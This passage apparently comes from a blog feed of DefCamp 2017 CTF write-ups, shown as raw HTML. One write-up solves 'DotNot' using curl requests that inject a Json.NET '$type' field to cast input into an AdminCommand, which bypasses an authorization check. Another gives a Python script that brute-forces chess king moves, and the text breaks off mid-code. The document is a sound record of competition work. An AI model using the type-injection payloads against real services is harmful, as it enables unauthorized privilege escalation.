class="p">)</span> <span class="k">this</span><span class="p">).</span><span class="nf">get_Request</span><span class="p">().</span><span class="nf">get_Body</span><span class="p">())).</span><span class="nf">ReadToEnd</span><span class="p">();</span> <span class="n">Console</span><span class="p">.</span><span class="nf">WriteLine</span><span class="p">(</span><span class="n">end</span><span class="p">);</span> <span class="k">try</span> <span class="p">{</span> <span class="kt">string</span> <span class="n">str1</span> <span class="p">=</span> <span class="n">end</span><span class="p">;</span> <span class="n">JsonSerializerSettings</span> <span class="n">serializerSettings</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">JsonSerializerSettings</span><span class="p">();</span> <span class="kt">int</span> <span class="n">num</span> <span class="p">=</span> <span class="m">4</span><span class="p">;</span> <span class="n">serializerSettings</span><span class="p">.</span><span class="nf">set_TypeNameHandling</span><span class="p">((</span><span class="n">TypeNameHandling</span><span class="p">)</span> <span class="n">num</span><span class="p">);</span> <span class="kt">string</span> <span class="n">str2</span> <span class="p">=</span> <span class="n">JsonConvert</span><span class="p">.</span><span class="nf">SerializeObject</span><span class="p">((</span><span class="kt">object</span><span class="p">)</span> <span class="k">this</span><span class="p">.</span><span class="n">_executor</span><span class="p">.</span><span class="nf">Execute</span><span class="p">(((</span><span class="n">Request</span><span class="p">)</span> <span class="n">JsonConvert</span><span class="p">.</span><span class="n">DeserializeObject</span><span class="p">&lt;</span><span class="n">Request</span><span class="p">&gt;(</span><span class="n">str1</span><span class="p">,</span> <span class="n">serializerSettings</span><span class="p">)).</span><span class="n">Command</span><span class="p">));</span> <span class="n">Console</span><span class="p">.</span><span class="nf">WriteLine</span><span class="p">(</span><span class="n">str2</span><span class="p">);</span> <span class="k">return</span> <span class="n">str2</span><span class="p">;</span> <span class="p">}</span> <span class="k">catch</span> <span class="p">(</span><span class="n">Exception</span> <span class="n">ex</span><span class="p">)</span> <span class="p">{</span> <span class="n">Console</span><span class="p">.</span><span class="nf">WriteLine</span><span class="p">(</span><span class="n">ex</span><span class="p">.</span><span class="n">Message</span><span class="p">);</span> <span class="k">return</span> <span class="n">ex</span><span class="p">.</span><span class="n">Message</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> <p>Few notes:</p> <ol> <li>Data provided is parsed to a Command object found in models.</li> <li><a href="https://www.newtonsoft.com/json/help/html/T_Newtonsoft_Json_TypeNameHandling.htm">TypeNameHandling</a> is set to Auto, which we need later.</li> </ol> <h3 id="1-authenticate">1. Authenticate:</h3> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">abatchy@ubuntu:~/Desktop$</span> curl <span class="nt">-X</span> POST <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="nt">-d</span> <span class="s1">'{"Command":{ "Action": "authenticate" } }'</span> https://dotnot.dctf-quals-17.def.camp/api/command <span class="go"> {"UserId":"da268d19-b985-4779-bbdf-736ee4ec9b32","Action":"authenticate","Query":null,"Value":null,"Response":null,"Error":null} </span></code></pre></div></div> <p>From now on we’ll be using the GUID provided.</p> <h3 id="2-readflag">2. Readflag</h3> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">abatchy@ubuntu:~/Desktop$</span> curl <span class="nt">-X</span> POST <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="nt">-d</span> <span class="s1">'{"Command":{"UserId":"da268d19-b985-4779-bbdf-736ee4ec9b32", "Action":"Readflag" } }'</span> https://dotnot.dctf-quals-17.def.camp/api/command <span class="go"> Command not allowed! </span></code></pre></div></div> <p>So unfortunately this command fails as the <code class="highlighter-rouge">flag</code> is set to false. We need to cast the JSON to an AdminCommand using <code class="highlighter-rouge">$type</code> field.</p> <p>I tried setting it to <code class="highlighter-rouge">DCTFNetCoreWebApp.Models.AdminCommand</code> but it returned an error message.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">abatchy@ubuntu:~/Desktop$</span> curl <span class="nt">-X</span> POST <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="nt">-d</span> <span class="s1">'{"$type":"DCTFNetCoreWebApp.Models.AdminCommand", "Command":{"UserId":"da268d19-b985-4779-bbdf-736ee4ec9b32", "Action":"Readflag" } }'</span> https://dotnot.dctf-quals-17.def.camp/api/command <span class="go"> </span><span class="gp">Type specified in JSON 'DCTFNetCoreWebApp.Models.AdminCommand' was not resolved. Path '$</span><span class="nb">type</span><span class="s1">', line 1, position 48. </span></code></pre></div></div> <p>Then I thought of casting it to a known class that definitely exists, maybe the error shows any data.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">abatchy@ubuntu:~/Desktop$</span> curl <span class="nt">-X</span> POST <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="nt">-d</span> <span class="s1">'{"Command":{"$type":"System.Guid", "UserId":"da268d19-b985-4779-bbdf-736ee4ec9b32", "Action":"Readflag" } }'</span> https://dotnot.dctf-quals-17.def.camp/api/command <span class="go"> </span><span class="gp">Type specified in JSON 'System.Guid, System.Private.CoreLib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=7cec85d7bea7798e' is not compatible with 'DCTFNetCoreWebApp.Models.Command, DCTFNetCoreWebApp, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null'. Path 'Command.$</span><span class="nb">type</span><span class="s1">', line 1, position 33. </span></code></pre></div></div> <p>Nice! We got the full type to use, replace Request with AdminCommand and we’re good to go.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">abatchy@ubuntu:~/Desktop$</span> curl <span class="nt">-X</span> POST <span class="nt">-H</span> <span class="s2">"Content-Type: application/json"</span> <span class="nt">-d</span> <span class="s1">'{"Command":{"$type":"DCTFNetCoreWebApp.Models.AdminCommand, DCTFNetCoreWebApp, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null", "UserId":"da268d19-b985-4779-bbdf-736ee4ec9b32", "Action":"Readflag" } }'</span> https://dotnot.dctf-quals-17.def.camp/api/command <span class="go"> {"UserId":"da268d19-b985-4779-bbdf-736ee4ec9b32","Action":"Readflag","Query":null,"Value":null,"Response":"DCTF{4e388d989d6e9cfd2ba8a0ddf0f870c23c4936fabfc5c271d065a467af96e387}\n","Error":null} </span></code></pre></div></div> <p>The flag is <code class="highlighter-rouge">DCTF{4e388d989d6e9cfd2ba8a0ddf0f870c23c4936fabfc5c271d065a467af96e387}</code>.</p> <p>- Abatchy</p> Sun, 01 Oct 2017 11:00:00 +0000 http://abatchy17.github.io/2017/10/defcamp-dotnot http://abatchy17.github.io/2017/10/defcamp-dotnot [DefCamp CTF Qualification 2017] Buggy Bot (Misc 400) <h2 id="buggy-bot">Buggy Bot</h2> <p>The python <a href="https://dctf.def.camp/quals-2017-kalskflsafkl/chess.py">code</a> provided allows you to make a single move then it makes some predefined moves. The goal was a bit confusing to me at first as I wasn’t sure if they wanted the position of the king after the first move only (assuming it survided) or its final position regardless. It was the latter.</p> <p>I tweaked the code a bit so that it tries all the possible (wrong) moves that would matter, which are the king’s only, moving other pieces is irrelevant. So basically:</p> <ol> <li>Make king move from e1 to X ([a-h][1-8]).</li> <li>Let bot make moves.</li> <li>If king survived after those moves, add its position to a set list.</li> </ol> <p>This sloppy code does it:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#/usr/bin/python2.7</span> <span class="n">column_reference</span> <span class="o">=</span> <span class="s">"a b c d e f g h"</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">" "</span><span class="p">)</span> <span class="n">EMPTY_SQUARE</span> <span class="o">=</span> <span class="s">" "</span> <span class="n">row_letters</span> <span class="o">=</span> <span class="s">"abcdefgh"</span> <span class="n">king_moves</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">position</span> <span class="o">=</span> <span class="s">''</span> <span class="n">dest</span> <span class="o">=</span> <span class="s">''</span> <span class="n">solution</span> <span class="o">=</span> <span class="nb">set</span><span class="p">([])</span> <span class="k">class</span> <span class="nc">Model</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">board</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">pawn_base</span> <span class="o">=</span> <span class="s">"P "</span><span class="o">*</span><span class="mi">8</span> <span class="n">white_pieces</span> <span class="o">=</span> <span class="s">"R N B Q K B N R"</span> <span class="n">white_pawns</span> <span class="o">=</span> <span class="n">pawn_base</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> <span class="n">black_pieces</span> <span class="o">=</span> <span class="n">white_pieces</span><span class="o">.</span><span class="n">lower</span><span class="p">()</span> <span class="n">black_pawns</span> <span class="o">=</span> <span class="n">white_pawns</span><span class="o">.</span><span class="n">lower</span><span class="p">()</span> <span class="bp">self</span><span class="o">.</span><span class="n">board</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">black_pieces</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">" "</span><span class="p">))</span> <span class="bp">self</span><span class="o">.</span><span class="n">board</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">black_pawns</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">" "</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">board</span><span class="o">.</span><span class="n">append</span><span class="p">([</span><span class="n">EMPTY_SQUARE</span><span class="p">]</span><span class="o">*</span><span class="mi">8</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">board</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">white_pawns</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">" "</span><span class="p">))</span> <span class="bp">self</span><span class="o">.</span><span class="n">board</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">white_pieces</span><span class="o">.</span><span class="n">split</span><span class="p">(</span><span class="s">" "</span><span class="p">))</span> <span class="k">def</span> <span class="nf">move</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">):</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="p">[</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">]:</span> <span class="k">if</span> <span class="n">c</span><span class="o">.</span><span class="n">i</span> <span class="o">&gt;</span> <span class="mi">7</span> <span class="ow">or</span> <span class="n">c</span><span class="o">.</span><span class="n">j</span> <span class="o">&gt;</span> <span class="mi">7</span> <span class="ow">or</span> <span class="n">c</span><span class="o">.</span><span class="n">i</span> <span class="o">&lt;</span><span class="mi">0</span> <span class="ow">or</span> <span class="n">c</span><span class="o">.</span><span class="n">j</span> <span class="o">&lt;</span><span class="mi">0</span><span class="p">:</span> <span class="k">return</span> <span class="k">if</span> <span class="n">start</span><span class="o">.</span><span class="n">i</span> <span class="o">==</span> <span class="n">destination</span><span class="o">.</span><span class="n">i</span> <span class="ow">and</span> <span class="n">start</span><span class="o">.</span><span class="n">j</span> <span class="o">==</span> <span class="n">destination</span><span class="o">.</span><span class="n">j</span><span class="p">:</span> <span class="k">return</span> <span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">board</span><span class="p">[</span><span class="n">start</span><span class="o">.</span><span class="n">i</span><span class="p">][</span><span class="n">start</span><span class="o">.</span><span class="n">j</span><span class="p">]</span> <span class="o">==</span> <span class="n">EMPTY_SQUARE</span><span class="p">:</span> <span class="k">return</span> <span class="n">f</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">board</span><span class="p">[</span><span class="n">start</span><span class="o">.</span><span class="n">i</span><span class="p">][</span><span class="n">start</span><span class="o">.</span><span class="n">j</span><span class="p">]</span> <span class="bp">self</span><span class="o">.</span><span class="n">board</span><span class="p">[</span><span class="n">destination</span><span class="o">.</span><span class="n">i</span><span class="p">][</span><span class="n">destination</span><span class="o">.</span><span class="n">j</span><span class="p">]</span> <span class="o">=</span> <span class="n">f</span> <span class="bp">self</span><span class="o">.</span><span class="n">board</span><span class="p">[</span><span class="n">start</span><span class="o">.</span><span class="n">i</span><span class="p">][</span><span class="n">start</span><span class="o">.</span><span class="n">j</span><span class="p">]</span> <span class="o">=</span> <span class="n">EMPTY_SQUARE</span> <span class="k">class</span> <span class="nc">BoardLocation</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">i</span><span class="p">,</span> <span class="n">j</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">i</span> <span class="o">=</span> <span class="n">i</span> <span class="bp">self</span><span class="o">.</span><span class="n">j</span> <span class="o">=</span> <span class="n">j</span> <span class="k">class</span> <span class="nc">View</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="k">pass</span> <span class="k">def</span> <span class="nf">display</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">board</span><span class="p">):</span> <span class="k">print</span><span class="p">(</span><span class="s">"</span><span class="si">%</span><span class="s">s: </span><span class="si">%</span><span class="s">s"</span><span class="o">%</span><span class="p">(</span><span class="s">" "</span><span class="p">,</span> <span class="n">column_reference</span><span class="p">))</span> <span class="k">print</span><span class="p">(</span><span class="s">"-"</span><span class="o">*</span><span class="mi">50</span><span class="p">)</span> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">row</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">board</span><span class="p">):</span> <span class="n">row_marker</span> <span class="o">=</span> <span class="mi">8</span><span class="o">-</span><span class="n">i</span> <span class="k">print</span><span class="p">(</span><span class="s">"</span><span class="si">%</span><span class="s">s: </span><span class="si">%</span><span class="s">s"</span><span class="o">%</span><span class="p">(</span><span class="n">row_marker</span><span class="p">,</span> <span class="n">row</span><span class="p">))</span> <span class="k">class</span> <span class="nc">Controller</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span> <span class="o">=</span> <span class="n">Model</span><span class="p">()</span> <span class="bp">self</span><span class="o">.</span><span class="n">view</span> <span class="o">=</span> <span class="n">View</span><span class="p">()</span> <span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="k">global</span> <span class="n">solution</span> <span class="n">move</span> <span class="o">=</span> <span class="n">position</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="n">move</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"a2-b2"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"b2-c2"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"c2-d2"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"e2-f2"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"f2-g2"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"g2-h2"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"h2-a1"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"a1-b1"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"b1-c1"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"c1-d1"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"e1-f1"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"f1-g1"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"g1-h1"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"h1-a3"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"a3-b3"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"b3-c3"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"c3-d3"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"e3-f3"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"f3-g3"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"g3-h3"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"h3-a4"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"a4-b4"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"b4-c4"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"c4-d4"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"e4-f4"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"f4-g4"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"g4-h4"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"h4-a5"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"a5-b5"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"b5-c5"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"c5-d5"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"e5-f5"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"f5-g5"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"g5-h5"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"h5-a6"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"a6-b6"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span class="n">move</span><span class="p">(</span><span class="n">start</span><span class="p">,</span> <span class="n">destination</span><span class="p">)</span> <span class="n">start</span><span class="p">,</span> <span class="n">destination</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">parse_move</span><span class="p">(</span><span class="s">"b6-c6"</span><span class="p">)</span> <span class="bp">self</span><span class="o">.</span><span class="n">model</span><span class="o">.</span><span 